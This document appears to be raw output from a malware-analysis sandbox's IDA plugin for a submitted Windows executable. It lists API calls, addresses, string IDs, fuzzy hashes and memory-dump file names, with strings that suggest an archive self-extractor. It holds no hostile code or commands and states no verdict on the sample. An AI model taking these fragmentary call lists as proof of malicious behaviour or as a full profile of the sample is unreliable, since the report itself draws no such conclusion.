                • API String ID: 3852720340-0
                • Opcode ID: f15bbac7497c35fa57fecec961433480fbf2e686b747d3dd8c8aaaa6eb8d7b8b
                • Instruction ID: 5fb683b91907b06235b1e3f13026f3ea197dc9b4008022c5e0670b0fcb5999f4
                • Opcode Fuzzy Hash: f15bbac7497c35fa57fecec961433480fbf2e686b747d3dd8c8aaaa6eb8d7b8b
                • Instruction Fuzzy Hash: E701D83210971A6EE7542FB6BF8653F2A48EB217797310B2FF710552E0EF9A4C09614C
                APIs
                • GetLastError.KERNEL32(?,?,?,004F895F,004F85FB,?,004F8FD3,00000001,00000364,?,004F3713,00000050,?,00510EE8,00000200), ref: 004F902E
                • _free.LIBCMT ref: 004F9063
                • _free.LIBCMT ref: 004F908A
                • SetLastError.KERNEL32(00000000,?,00510EE8,00000200), ref: 004F9097
                • SetLastError.KERNEL32(00000000,?,00510EE8,00000200), ref: 004F90A0
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                 • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: ErrorLast$_free
                • String ID: XP
                • API String ID: 3170660625-3026131541
                • Opcode ID: 84fd8cc7a44d0be70e83543e45db172eb967a3fbb5a7301ab00aa0e7ad00008f
                • Instruction ID: 2c033028d422f4c6a9d85ea0f7636bd42099eca2bdfd5bceff4b780885aa3bfb
                • Opcode Fuzzy Hash: 84fd8cc7a44d0be70e83543e45db172eb967a3fbb5a7301ab00aa0e7ad00008f
                • Instruction Fuzzy Hash: 4801D176506A086ED32227366C8AB3B365DABD0375734002FF709E2352EE6C8C06616E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                 • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID:
                • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                • API String ID: 0-1718035505
                • Opcode ID: 0692e09cf2a50d1946201c8eb98c9f5fd981e5d268ad084af8d2afd5d61ae146
                • Instruction ID: 571d96acc95bebcd0a2b912ea9fd1c38374c51c331b4f489b083285f32c408b5
                • Opcode Fuzzy Hash: 0692e09cf2a50d1946201c8eb98c9f5fd981e5d268ad084af8d2afd5d61ae146
                • Instruction Fuzzy Hash: C1012D31E413625BCF205F765C956EB5798BB51393330227BE542D3380EA95CC4AE6A4
                APIs
                • _free.LIBCMT ref: 004F807E
                  • Part of subcall function 004F84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,004FBFA7,?,00000000,?,00000000,?,004FBFCE,?,00000007,?,?,004FC3CB,?), ref: 004F84F4
                  • Part of subcall function 004F84DE: GetLastError.KERNEL32(?,?,004FBFA7,?,00000000,?,00000000,?,004FBFCE,?,00000007,?,?,004FC3CB,?,?), ref: 004F8506
                • _free.LIBCMT ref: 004F8090
                • _free.LIBCMT ref: 004F80A3
                • _free.LIBCMT ref: 004F80B4
                • _free.LIBCMT ref: 004F80C5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                 • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID: P
                • API String ID: 776569668-2113778011
                • Opcode ID: 7e3aef3d9d280a65bef643b23d2c6ecb8d9a25ed9e78b95e998d8f1275ee2a77
                • Instruction ID: 93432180294a008b63640705e5fd91bb978478638215ff3508343c25d4797847
                • Opcode Fuzzy Hash: 7e3aef3d9d280a65bef643b23d2c6ecb8d9a25ed9e78b95e998d8f1275ee2a77
                • Instruction Fuzzy Hash: C5F01DBA8019299BC7126B26BC0342A3A65F724720319460FF9009EB70DF390459AFCD
                APIs
                • SystemTimeToFileTime.KERNEL32(?,?), ref: 004E0D0D
                  • Part of subcall function 004DACF5: GetVersionExW.KERNEL32(?), ref: 004DAD1A
                • LocalFileTimeToFileTime.KERNEL32(?,004E0CB8), ref: 004E0D31
                • FileTimeToSystemTime.KERNEL32(?,?), ref: 004E0D47
                • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 004E0D56
                • SystemTimeToFileTime.KERNEL32(?,004E0CB8), ref: 004E0D64
                • SystemTimeToFileTime.KERNEL32(?,?), ref: 004E0D72
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                 • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: Time$File$System$Local$SpecificVersion
                • String ID:
                • API String ID: 2092733347-0
                • Opcode ID: f7481b1f0e8b103d5864ffd0202d528db657d0b6eb6fc6d83fbc654b0a2a9863
                • Instruction ID: 6ed25b8a06165a43f18cdbf50b8496a4da9c6ddf10bccf60540f0fcd9ec4b77f
                • Opcode Fuzzy Hash: f7481b1f0e8b103d5864ffd0202d528db657d0b6eb6fc6d83fbc654b0a2a9863
                • Instruction Fuzzy Hash: 6731E97A900249EBCB00DFE5C8859EFFBBCFF58700B04455AE955E3610E7349685CB69
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                 • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: _memcmp
                • String ID:
                • API String ID: 2931989736-0
                • Opcode ID: b8cb838b7b7ff36935d7bf23b3a1bea926ac2dbacab327cbe40c8a5ca6b58780
                • Instruction ID: fb466d006750e9809ecf5c59c01ae00c888a0e17fd30be69f34a0895c4f4c563
                • Opcode Fuzzy Hash: b8cb838b7b7ff36935d7bf23b3a1bea926ac2dbacab327cbe40c8a5ca6b58780
                • Instruction Fuzzy Hash: 5C21077160014E7BDB049E12CC81E7F7BADAB50749B14896AFD0997381F238DD454695
                APIs
                • WaitForSingleObject.KERNEL32(?,0000000A), ref: 004ED2F2
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 004ED30C
                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004ED31D
                • TranslateMessage.USER32(?), ref: 004ED327
                • DispatchMessageW.USER32(?), ref: 004ED331
                • WaitForSingleObject.KERNEL32(?,0000000A), ref: 004ED33C
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                 • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                • String ID:
                • API String ID: 2148572870-0
                • Opcode ID: 71ecdfa824c498bb3d0486b2ccd264631660383162aafd906a377a51254f17e1
                • Instruction ID: 62ab9ee3bdb6c7d2abcd20140749c582652a42828893f3f2a04f74519292322e
                • Opcode Fuzzy Hash: 71ecdfa824c498bb3d0486b2ccd264631660383162aafd906a377a51254f17e1
                • Instruction Fuzzy Hash: 66F03C72E02119ABCB205BA2DC4CEDFBF6DEF61392F008012FA06D2110D6388549D7A1
                APIs
                • _wcschr.LIBVCRUNTIME ref: 004EC435
                  • Part of subcall function 004E17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,004DBB05,00000000,.exe,?,?,00000800,?,?,004E85DF,?), ref: 004E17C2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: CompareString_wcschr
                • String ID: <$HIDE$MAX$MIN
                • API String ID: 2548945186-3358265660
                • Opcode ID: 98616d5a19ac21df41809a37a2568ebff13c6f670cdc8f00b775a3814b60b59f
                • Instruction ID: 12d124536dfcdd79e1d536b70153fb23059191888a41bbb49fcc599c60a4418c
                • Opcode Fuzzy Hash: 98616d5a19ac21df41809a37a2568ebff13c6f670cdc8f00b775a3814b60b59f
                • Instruction Fuzzy Hash: C931A176900289AADF21DA96CC81FEF77BCEB14305F0040A7FA45D6190EBB89FC58A54
                APIs
                  • Part of subcall function 004D130B: GetDlgItem.USER32(00000000,00003021), ref: 004D134F
                  • Part of subcall function 004D130B: SetWindowTextW.USER32(00000000,005035B4), ref: 004D1365
                • EndDialog.USER32(?,00000001), ref: 004EA9DE
                • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 004EA9F6
                • SetDlgItemTextW.USER32(?,00000067,?), ref: 004EAA24
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: ItemText$DialogWindow
                • String ID: GETPASSWORD1$xjR
                • API String ID: 445417207-3697140082
                • Opcode ID: 4d834347c9e5e44e04e54795ceb5ca5654f1d6b17710d199d5ce98bc7ced33b9
                • Instruction ID: 712b54f927f0e88684f603977713a9b168551cb34e95f09055e8b4f2c775384d
                • Opcode Fuzzy Hash: 4d834347c9e5e44e04e54795ceb5ca5654f1d6b17710d199d5ce98bc7ced33b9
                • Instruction Fuzzy Hash: 4A116F7294011876DB219E669D09FFB3B7CEF19706F000423FA45F3291C268AD65D677
                APIs
                • LoadBitmapW.USER32(00000065), ref: 004EADFD
                • GetObjectW.GDI32(00000000,00000018,?), ref: 004EAE22
                • DeleteObject.GDI32(00000000), ref: 004EAE54
                • DeleteObject.GDI32(00000000), ref: 004EAE77
                  • Part of subcall function 004E9E1C: FindResourceW.KERNEL32(004EAE4D,PNG,?,?,?,004EAE4D,00000066), ref: 004E9E2E
                  • Part of subcall function 004E9E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,004EAE4D,00000066), ref: 004E9E46
                  • Part of subcall function 004E9E1C: LoadResource.KERNEL32(00000000,?,?,?,004EAE4D,00000066), ref: 004E9E59
                  • Part of subcall function 004E9E1C: LockResource.KERNEL32(00000000,?,?,?,004EAE4D,00000066), ref: 004E9E64
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                • String ID: ]
                • API String ID: 142272564-3352871620
                • Opcode ID: 540ea6bcee83571a6fc386ce71e3d30592d6f29b8b91b135ae06f7e28eaec556
                • Instruction ID: 0c722db2097f0e00923be137bc77bf1f6d98c9b25e726a309fff3aa43c638c41
                • Opcode Fuzzy Hash: 540ea6bcee83571a6fc386ce71e3d30592d6f29b8b91b135ae06f7e28eaec556
                • Instruction Fuzzy Hash: 01012B32980665A7C710676B5C0AF7F7B799B81B43F080116FD00A73D1DB394C2996B6
                APIs
                  • Part of subcall function 004D130B: GetDlgItem.USER32(00000000,00003021), ref: 004D134F
                  • Part of subcall function 004D130B: SetWindowTextW.USER32(00000000,005035B4), ref: 004D1365
                • EndDialog.USER32(?,00000001), ref: 004ECCDB
                • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 004ECCF1
                • SetDlgItemTextW.USER32(?,00000066,?), ref: 004ECD05
                • SetDlgItemTextW.USER32(?,00000068), ref: 004ECD14
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: ItemText$DialogWindow
                • String ID: RENAMEDLG
                • API String ID: 445417207-3299779563
                • Opcode ID: 9c5c6bdcbbe53da87e46642b4259be437df524ecea4e41c896bd524f2f2948b7
                • Instruction ID: f30727f5ebcb10b635dbf9802189e16ea381e341974fec0c6116d288551e0166
                • Opcode Fuzzy Hash: 9c5c6bdcbbe53da87e46642b4259be437df524ecea4e41c896bd524f2f2948b7
                • Instruction Fuzzy Hash: 79012D322843507AD1214F659D49F973B6DEB66743F200412F345A12E0C66A591BE769
                APIs
                • ___BuildCatchObject.LIBVCRUNTIME ref: 004F251A
                  • Part of subcall function 004F2B52: ___AdjustPointer.LIBCMT ref: 004F2B9C
                • _UnwindNestedFrames.LIBCMT ref: 004F2531
                • ___FrameUnwindToState.LIBVCRUNTIME ref: 004F2543
                • CallCatchBlock.LIBVCRUNTIME ref: 004F2567
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                • String ID: /)O
                • API String ID: 2633735394-1853168421
                • Opcode ID: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                • Instruction ID: b783c4b34974892bd8706c5e7c9501d67867ea9b7a1bc25a18e1ec31d72b6fac
                • Opcode Fuzzy Hash: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                • Instruction Fuzzy Hash: 63012D3200010DBBCF129F56CD11EEA3BBAFF58714F15401AFE1865120C37AE961DBA9
                APIs
                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004F7573,00000000,?,004F7513,00000000,0050BAD8,0000000C,004F766A,00000000,00000002), ref: 004F75E2
                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004F75F5
                • FreeLibrary.KERNEL32(00000000,?,?,?,004F7573,00000000,?,004F7513,00000000,0050BAD8,0000000C,004F766A,00000000,00000002), ref: 004F7618
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AddressFreeHandleLibraryModuleProc
                • String ID: CorExitProcess$mscoree.dll
                • API String ID: 4061214504-1276376045
                • Opcode ID: 548f32fa6d3d152d718857dce5e6cc55c7cd0decaea3f00f454b14d51a2d4f26
                • Instruction ID: 8c76ab6d203902b80f757e7495ca21eae22c2fde9e3accf9702ec3a17d2937f6
                • Opcode Fuzzy Hash: 548f32fa6d3d152d718857dce5e6cc55c7cd0decaea3f00f454b14d51a2d4f26
                • Instruction Fuzzy Hash: 72F0C83060851DBBDB159F55DC09BAEBFB8EF04711F104069F805E2250EF388E44DB54
                APIs
                  • Part of subcall function 004E0085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 004E00A0
                  • Part of subcall function 004E0085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,004DEB86,Crypt32.dll,00000000,004DEC0A,?,?,004DEBEC,?,?,?), ref: 004E00C2
                • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 004DEB92
                • GetProcAddress.KERNEL32(005181C0,CryptUnprotectMemory), ref: 004DEBA2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AddressProc$DirectoryLibraryLoadSystem
                • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                • API String ID: 2141747552-1753850145
                • Opcode ID: f9fe74b6b32994e3aeaa9ef0c3b1b5deb1ffd9bcc93bd0668597b896b87a2d72
                • Instruction ID: 7fe920367a4d2eb262575ac33705f7cc267f5906bb35085078822f1b01fafe0b
                • Opcode Fuzzy Hash: f9fe74b6b32994e3aeaa9ef0c3b1b5deb1ffd9bcc93bd0668597b896b87a2d72
                • Instruction Fuzzy Hash: 98E04F704017419EDB309F3A9818B4ABEE86B14705F008C1FE4D6D3290D6F8E5849B60
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: _free
                • String ID:
                • API String ID: 269201875-0
                • Opcode ID: 08c34b9d94c4f5edad5c6da8650a81fdc0a06d956d0c3725e549919d4eb1ce15
                • Instruction ID: eff1ebbbb83651b478743d6b39fe4c0a8887e8e7de5bd60727601821af11cb5b
                • Opcode Fuzzy Hash: 08c34b9d94c4f5edad5c6da8650a81fdc0a06d956d0c3725e549919d4eb1ce15
                • Instruction Fuzzy Hash: 9B41F532A00308AFDB14DF79C881A6EB7A5EF85314F5545AEE615EB341DB39ED01CB84
                APIs
                • GetEnvironmentStringsW.KERNEL32 ref: 004FB619
                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004FB63C
                  • Part of subcall function 004F8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,004FC13D,00000000,?,004F67E2,?,00000008,?,004F89AD,?,?,?), ref: 004F854A
                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 004FB662
                • _free.LIBCMT ref: 004FB675
                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004FB684
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                • String ID:
                • API String ID: 336800556-0
                • Opcode ID: 450114e0b805a22a163933e95661f8921ee7d4f62bd10bb5401e9ce40b7eab2b
                • Instruction ID: f03d0ce1eba8b354a46b36bd32eace5ff2ae51dc20680df0a3d9aab531ad847e
                • Opcode Fuzzy Hash: 450114e0b805a22a163933e95661f8921ee7d4f62bd10bb5401e9ce40b7eab2b
                • Instruction Fuzzy Hash: DF017172601619BBB3211676AC88D7F6A6DDEC7BA4325022EBE04C6210DF688D0191FA
                APIs
                  • Part of subcall function 004E0A41: ResetEvent.KERNEL32(?), ref: 004E0A53
                  • Part of subcall function 004E0A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 004E0A67
                • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 004E078F
                • CloseHandle.KERNEL32(?,?), ref: 004E07A9
                • DeleteCriticalSection.KERNEL32(?), ref: 004E07C2
                • CloseHandle.KERNEL32(?), ref: 004E07CE
                • CloseHandle.KERNEL32(?), ref: 004E07DA
                  • Part of subcall function 004E084E: WaitForSingleObject.KERNEL32(?,000000FF,004E0A78,?), ref: 004E0854
                  • Part of subcall function 004E084E: GetLastError.KERNEL32(?), ref: 004E0860
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                • String ID:
                • API String ID: 1868215902-0
                • Opcode ID: 368babb7a3c1b4709ed7eabe768585c374d0f3597e30e139ede721e77b8970d6
                • Instruction ID: 57665e1a1f26302a5624cc81b9eafe7b9cb0f3c047a0f68abffc0c4dcbb6bd55
                • Opcode Fuzzy Hash: 368babb7a3c1b4709ed7eabe768585c374d0f3597e30e139ede721e77b8970d6
